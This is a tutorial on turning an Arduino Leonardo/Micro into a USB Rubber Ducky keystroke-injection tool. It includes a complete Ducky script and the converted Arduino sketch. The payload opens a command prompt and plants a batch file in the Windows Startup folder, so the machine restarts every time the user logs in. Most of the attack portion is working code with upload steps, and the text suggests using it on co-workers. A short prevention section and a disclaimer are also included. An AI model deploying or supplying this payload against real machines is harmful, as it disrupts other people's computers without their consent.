USB Rubber Duckies with Arduino

What is Rubber Ducky?

Imagine you could walk up to a computer, plug in a seemingly innocent USB drive, and have it install a backdoor, exfiltrate documents, steal passwords or any number of pentest tasks.

The Rubber Ducky is a USB keystroke injection tool that acts as a keyboard. It is a macro keyboard device that automates keystrokes that can type up to 1000 words per minute! Anything that can be done on a keyboard can be done with the Ducky.

The USB Rubber Ducky is an awesome device for penetration testing and general mischief. While it appears to be an innocuous USB thumb drive, when it is plugged into a computer, it instead registers itself as a USB keyboard on the system and fires off a keystroke payload at lightning speed.

This article will demonstrate the applications and the setup of the Ducky.

How to prevent attacks?

Protecting yourself from a Ducky attack is simple

Don’t plug in unknown USB’s, it might not be a USB at all.

Don’t leave your laptop, computer, or cellphone unattended. A Ducky can attack anything that can use a keyboard. If someone has physical access to your computer all it takes no longer than 10 seconds for a hacker to get what they want.

Where to find a ducky?

hak5 is the official website to purchase these rubber ducky. These generally cost around 45$ per piece which is actually not required in the procedure that we are going to follow.

Our aim is to make these rubber duckies out of Arduino Leonardo/ Micro which will be as effective as the original Duckies and cheap too.

Requirements for Arduino Ducky

A Ducky Script

Arduino Leonardo/Micro

Arduino IDE

Arduino Nano cable (Type B to USB)

Ducky file convertor

Where to get a Ducky File?

A Ducky file is a file in which we write all the commands or say the payload which gets deployed once the ducky is inserted in the target device. A quick way to learn ducky scripting is by following this GitHub Repo

There is also a list of pre-built ducky-scripts if you don't know how to write ducky scripts, for you to play with.

We in this article are going to use the script given below:

ESCAPE
CONTROL ESCAPE
DELAY 400
STRING cmd
ENTER
DELAY 100
REM start making Shutdown.bat 
STRING copy con "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Shutdown.bat"
STRING @echo off
ENTER
STRING shutdown /r /t 30
REM The shutdown command has many good options '/t' adds a Delay, and '/r' restarts
REM '/s' will shut the computer down and '/l' (L) is to just logoff the user more options are available by running 'shutdown /?'
ENTER
CTRL z
STRING exit
ENTER

Now that you have a Ducky file the next step will be to convert this Ducky file to Arduino compatible file. There are lots of online converters available which will carry on this task for you.

The output of the converter looks like this:

#include <Keyboard.h> 
// Init function
void setup()
{
  // Begining the stream
  Keyboard.begin();
// Waiting 500ms for init
  delay(500);
typeKey(27);
Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(27);
  Keyboard.releaseAll();
delay(400);
Keyboard.print("cmd");
typeKey(KEY_RETURN);
delay(100);
// start making Shutdown.bat
  Keyboard.print("copy con \"%userprofile%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Shutdown.bat\"");
Keyboard.print("@echo off");
typeKey(KEY_RETURN);
Keyboard.print("shutdown /r /t 30");
// The shutdown command has many good options '/t' adds a Delay, and '/r' restarts
  // '/s' will shut the computer down and '/l' (L) is to just logoff the user more options are available by running 'shutdown /?'
  typeKey(KEY_RETURN);
Keyboard.press(KEY_LEFT_CTRL);
  Keyboard.press(122);
  Keyboard.releaseAll();
Keyboard.print("exit");
typeKey(KEY_RETURN);
}
void typeKey(int key)
{
  Keyboard.press(key);
  delay(50);
  Keyboard.release(key);
}
// Unused
void loop() {}

Arduino Micro & Arduino IDE

This step requires installation of Arduino IDE which you can find here.

After installation of the Arduino IDE, open a new sketch and name it Ducky(You can name it whatever you feel like). Paste the above Arduino code in the Arduino IDE and compile and upload.

Compiled Code on Arduino IDE

As some might have already guessed, this code attempt to restart your system as soon as it is in action. There is no limit to the possibilities of what can be achieved using just this 3$ setup. Seconds of physical access is all it takes to deploy some of the most advanced pen-test attacks or IT automation tasks. But Rubber Ducky can also help practical jokes execution, for example with a script that quickly changes the wallpaper of a co-worker workstation.

Disclaimer

Don’t do anything illegal with this. Usage of Rubber Duckies for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, provincial/state and federal laws. Developer assumes NO liability and is NOT responsible for any misuse or damage caused by this program.